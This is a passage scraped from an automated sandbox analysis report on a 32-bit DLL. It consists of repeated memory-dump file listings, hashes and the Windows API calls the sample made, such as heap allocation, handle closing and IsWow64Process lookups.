                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExchangeInterlocked$CompletionErrorH_prologLastPostQueuedStatus
                              • String ID: pqcs
                              • API String ID: 1619523792-2559862021
                              • Opcode ID: 38085ce2ef203d1fb2b6d2eb11dd4c8be1551dd76d1307efa6c9e864882709fe
                              • Instruction ID: d7003f82c3a788c4ec782693b2fb590e89869557d80b1939503e8dc54251ca37
                              • Opcode Fuzzy Hash: 38085ce2ef203d1fb2b6d2eb11dd4c8be1551dd76d1307efa6c9e864882709fe
                              • Instruction Fuzzy Hash: 27F06D70A00204AFEB50DBA1C94DEAA77BCEF05749B14066EB801E2610EAB0E8489760
                              APIs
                              • __EH_prolog.LIBCMT ref: 6CEB4B14
                              • GetProcessHeap.KERNEL32(00000000,000000FF,?,?,?,?,6CEB8261,6CEB8261,?,6CEBF5E0,000000FF), ref: 6CEB4B21
                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,6CEB8261,6CEB8261,?,6CEBF5E0,000000FF), ref: 6CEB4B28
                              • std::exception::exception.LIBCMT ref: 6CEB4B42
                                • Part of subcall function 6CEBEDF3: __CxxThrowException@8.LIBCMT ref: 6CEBEE49
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocException@8H_prologProcessThrowstd::exception::exception
                              • String ID: ^l
                              • API String ID: 631700923-2649338665
                              • Opcode ID: 10af5f31a0150d82fcb0c2d8b26a728394a4fcd735ba47786a2d9d990b8e8459
                              • Instruction ID: 3eb89ff116cb6b81e37ec922e081b5866c84c3ec8b7a56209a44f35a09d71a9f
                              • Opcode Fuzzy Hash: 10af5f31a0150d82fcb0c2d8b26a728394a4fcd735ba47786a2d9d990b8e8459
                              • Instruction Fuzzy Hash: BEF08C76E04249AFCB00DFE0C94ABEEB738FB09745F204559F915A3A80DB749208CBA1
                              APIs
                              • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 6CEB4E30
                              • GetProcAddress.KERNEL32(00000000), ref: 6CEB4E37
                              • GetCurrentProcess.KERNEL32(00000000), ref: 6CEB4E47
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressCurrentHandleModuleProcProcess
                              • String ID: IsWow64Process$kernel32
                              • API String ID: 4190356694-3789238822
                              • Opcode ID: 7f0489250ce7e25c4b354e8fe58ef4f40833cf7245f14a8b9eb3f2bb1d5abc00
                              • Instruction ID: 470b2773ab0eefbf97881572fbe80515d9340cf0e0d0a2ec26492fd1460f4ee8
                              • Opcode Fuzzy Hash: 7f0489250ce7e25c4b354e8fe58ef4f40833cf7245f14a8b9eb3f2bb1d5abc00
                              • Instruction Fuzzy Hash: 1BE08672D1161CB7CB50D7E49D0CD9E77BCDB0D2A5F200981BA08E3500DA3499009BA0
                              APIs
                                • Part of subcall function 6CECA1C0: CloseHandle.KERNEL32(00000000,321BCB28), ref: 6CECA211
                                • Part of subcall function 6CECA1C0: WaitForSingleObject.KERNEL32(?,000000FF,321BCB28,?,?,?,?,321BCB28,6CECA193,321BCB28), ref: 6CECA228
                              • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 6CECA48E
                              • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 6CECA4AE
                              • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 6CECA4E7
                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 6CECA53B
                              • SetEvent.KERNEL32(?), ref: 6CECA542
                                • Part of subcall function 6CEB4CA0: CloseHandle.KERNEL32(00000000,?,6CECA475), ref: 6CEB4CC4
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseHandle$ReleaseSemaphore$EventObjectSingleWait
                              • String ID:
                              • API String ID: 4166353394-0
                              • Opcode ID: a7c3fee24c8c06c7e2068825a1a5e567730e5e0b0b6a7ddae59daf53778329f0
                              • Instruction ID: d15b157983e7e488fc5c7d8618794fcc35bb21e9bf0c03dde1500a06c142132b
                              • Opcode Fuzzy Hash: a7c3fee24c8c06c7e2068825a1a5e567730e5e0b0b6a7ddae59daf53778329f0
                              • Instruction Fuzzy Hash: A34101717817118FDB118F29CE84B17B7B4EB45328F24866CEC24EB781D738D8028B92
                              APIs
                              • _malloc.LIBCMT ref: 6CED9160
                                • Part of subcall function 6CECB71C: __FF_MSGBANNER.LIBCMT ref: 6CECB733
                                • Part of subcall function 6CECB71C: __NMSG_WRITE.LIBCMT ref: 6CECB73A
                                • Part of subcall function 6CECB71C: RtlAllocateHeap.NTDLL(01030000,00000000,00000001,00000000,00000000,00000000,?,6CED121A,?,?,?,00000000,?,6CED1107,00000018,6CEEAEA8), ref: 6CECB75F
                              • _free.LIBCMT ref: 6CED9173
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeap_free_malloc
                              • String ID:
                              • API String ID: 1020059152-0
                              • Opcode ID: a08fabd02a8c3ca3bb832fce5b5ad9678a60c699c49dd516b09bfe016ef7accb
                              • Instruction ID: fb8dd1c3fee8547ac5d75a28c93e93e593bc0936a0a7b18728b26859c8fc2853
                              • Opcode Fuzzy Hash: a08fabd02a8c3ca3bb832fce5b5ad9678a60c699c49dd516b09bfe016ef7accb
                              • Instruction Fuzzy Hash: 0011E733A04615ABDB511F749C1868937B4AF4636CB334629F9589BB80EF34A44686D1
                              APIs
                              • FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,00000010,00000000), ref: 6CEC9102
                              • GetLastError.KERNEL32(?,00000400,?,00000010,00000000), ref: 6CEC910A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorFormatLastMessage
                              • String ID: Unknown error$invalid string position
                              • API String ID: 3479602957-1837348584
                              • Opcode ID: c738d42ac253a6bd9f7e39f3c1f83ae6526de252afd47b644044ef8c90c1f983
                              • Instruction ID: 911d2a85cdf26f87f8165fe0ced6ed63db934358c877337032a1b1d1542d6201
